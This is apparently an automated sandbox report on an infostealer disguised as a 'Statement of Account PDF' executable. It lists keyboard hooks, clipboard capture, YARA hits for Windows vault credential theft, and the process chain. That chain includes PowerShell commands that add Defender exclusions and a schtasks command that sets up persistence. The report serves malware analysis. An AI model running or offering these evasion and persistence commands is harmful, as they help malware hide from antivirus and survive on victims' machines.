Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of 
Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.0000000006729000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151590709.0000000007DE4000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003385000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000306D000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003244000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000003135000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.0000000001040000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.000000000106A000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4124030684.0000000006777000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4120771933.00000000066C6000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.00000000030EC000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.000000000342C000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4073522473.00000000010CB000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4151301532.0000000007DD8000.00000004.00000020.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4121885551.000000000673F000.00000004.00000020.00020000.00000000.sdmp, Statement of 
Account PDF.bat.exe, 00000008.00000002.4150449840.0000000007DAB000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4121813503.00000000068ED000.00000004.00000020.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003136000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4074399117.000000000148A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmp, Statement of Account PDF.bat.exe, 00000008.00000002.4082420582.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000012.00000002.1856813364.0000000004928000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1916411729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000019.00000002.1945703172.0000000004798000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 0000001E.00000002.4081952252.000000000290C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: gDdsxauPhk.exe, 0000000F.00000002.4080192144.0000000003031000.00000004.00000800.00020000.00000000.sdmp, BjTxJte.exe, 00000016.00000002.1928490064.00000000034F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49734 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, 8WWn.cs .Net Code: UOFvW
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, 8WWn.cs .Net Code: UOFvW
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe Window created: window name: CLIPBRDWNDCLASS

                      System Summary

                      Source: 25.2.BjTxJte.exe.4798530.6.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4963d80.8.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 22.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4928d60.7.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 25.2.BjTxJte.exe.47d3550.5.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 25.2.BjTxJte.exe.47d3550.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4928d60.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 25.2.BjTxJte.exe.4798530.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 18.2.BjTxJte.exe.4963d80.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764AD6818_2_0764AD68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_07642C6818_2_07642C68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764545818_2_07645458
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_076434D818_2_076434D8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764712018_2_07647120
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764391018_2_07643910
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 18_2_0764309118_2_07643091
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0164E9E822_2_0164E9E8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_01644AC822_2_01644AC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0164ACC822_2_0164ACC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_01643EB022_2_01643EB0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_016441F822_2_016441F8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07041DC222_2_07041DC2
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07041DC822_2_07041DC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707556822_2_07075568
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_070765C822_2_070765C8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707C13822_2_0707C138
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707B1E822_2_0707B1E8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707303022_2_07073030
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07077D4822_2_07077D48
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707766822_2_07077668
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707E36022_2_0707E360
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707004022_2_07070040
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_07075CAF22_2_07075CAF
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 22_2_0707000622_2_07070006
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_04FC180825_2_04FC1808
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_04FC17F825_2_04FC17F8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A68825_2_06E8A688
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E89CC825_2_06E89CC8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E86CD825_2_06E86CD8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E839C025_2_06E839C0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A67C25_2_06E8A67C
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8728025_2_06E87280
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8727125_2_06E87271
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A3E025_2_06E8A3E0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8A3F025_2_06E8A3F0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8C38825_2_06E8C388
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E8C37825_2_06E8C378
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06E89CB825_2_06E89CB8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF34D825_2_06FF34D8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF2C6825_2_06FF2C68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF545825_2_06FF5458
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FFAD6825_2_06FFAD68
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF309125_2_06FF3091
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF712025_2_06FF7120
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_06FF391025_2_06FF3910
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AC90025_2_071AC900
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A9BC025_2_071A9BC0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A7A2025_2_071A7A20
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AF14825_2_071AF148
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A001625_2_071A0016
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071A004025_2_071A0040
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AAA6025_2_071AAA60
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071ABC8825_2_071ABC88
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071AD8A825_2_071AD8A8
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_071ABED025_2_071ABED0
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0739C55025_2_0739C550
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_0739E6F025_2_0739E6F0
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 1816
                      Source: Statement of Account PDF.bat.exeBinary or memory string: OriginalFilename vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.000000000459D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000000.1626756757.0000000000580000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUbK.exe& vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1709155218.0000000007288000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUbK.exe& vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1700653245.0000000004337000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1710403251.0000000007620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1699276440.0000000002A5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec0fe0520-5c7a-42ab-a1ed-336010ccc94a.exe4 vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000000.00000002.1694061767.0000000000ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exe, 00000008.00000002.4071828324.0000000000EF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exeBinary or memory string: OriginalFilenameUbK.exe& vs Statement of Account PDF.bat.exe
                      Source: Statement of Account PDF.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 25.2.BjTxJte.exe.4798530.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4963d80.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 22.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4928d60.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 25.2.BjTxJte.exe.47d3550.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 25.2.BjTxJte.exe.47d3550.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4928d60.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 25.2.BjTxJte.exe.4798530.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 18.2.BjTxJte.exe.4963d80.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Statement of Account PDF.bat.exe.43f8cd0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Statement of Account PDF.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: gDdsxauPhk.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, G39cBQ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, sDtvQjPGfa.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Statement of Account PDF.bat.exe.43bdcb0.5.raw.unpack, b1PPCKov2KZ.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, Dr83W1h4x8JWr6EBI0.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.Statement of Account PDF.bat.exe.45bb430.4.raw.unpack, rX6SQY6VW0eXSFLNTj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@36/32@2/2
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile created: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8032
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeMutant created: \Sessions\1\BaseNamedObjects\JATJfqjfmxt
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7400
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3864:120:WilError_03
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp690.tmp
                      Source: Statement of Account PDF.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Statement of Account PDF.bat.exeReversingLabs: Detection: 47%
                      Source: Statement of Account PDF.bat.exeVirustotal: Detection: 56%
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeFile read: C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\Statement of Account PDF.bat.exe "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gDdsxauPhk.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gDdsxauPhk" /XML "C:\Users\user\AppData\Local\Temp\tmp690.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeProcess created: C:\Users\user\Desktop\Statement of Account PDF.bat.exe "C:\Users\user\Desktop\Statement of Account PDF.bat.exe"
